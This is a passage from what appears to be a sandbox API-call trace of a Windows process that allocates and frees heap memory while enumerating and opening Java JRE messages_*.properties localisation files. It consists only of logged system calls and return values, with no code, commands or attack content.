0x88720 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0094.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.868] AreFileApisANSI () returned 1 [0094.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0094.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 69 [0094.868] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd51)) returned 1 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0094.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.868] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc97, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_it.properties", cAlternateFileName="MEC9EA~1.PRO")) returned 1 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0094.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0094.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0094.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0094.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0094.869] AreFileApisANSI () returned 1 [0094.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties", lpUsedDefaultChar=0x0) returned 69 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0094.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.869] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.870] AreFileApisANSI () returned 1 [0094.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0094.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 69 [0094.870] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.870] GetFileType (hFile=0x368) returned 0x1 [0094.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0094.870] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.870] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.870] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.870] CloseHandle (hObject=0x368) returned 1 [0094.871] AreFileApisANSI () returned 1 [0094.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0094.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 69 [0094.871] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.871] GetFileType (hFile=0x368) returned 0x1 [0094.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0094.871] CloseHandle (hObject=0x368) returned 1 [0094.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.872] AreFileApisANSI () returned 1 [0094.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0094.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties") returned 69 [0094.872] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc97)) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0094.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0094.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.873] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x18cd, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_ja.properties", cAlternateFileName="ME4AF1~1.PRO")) returned 1 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0094.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0094.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0094.873] AreFileApisANSI () returned 1 [0094.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties", lpUsedDefaultChar=0x0) returned 69 [0094.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0094.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.874] AreFileApisANSI () returned 1 [0094.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.874] RtlAllocateHeap 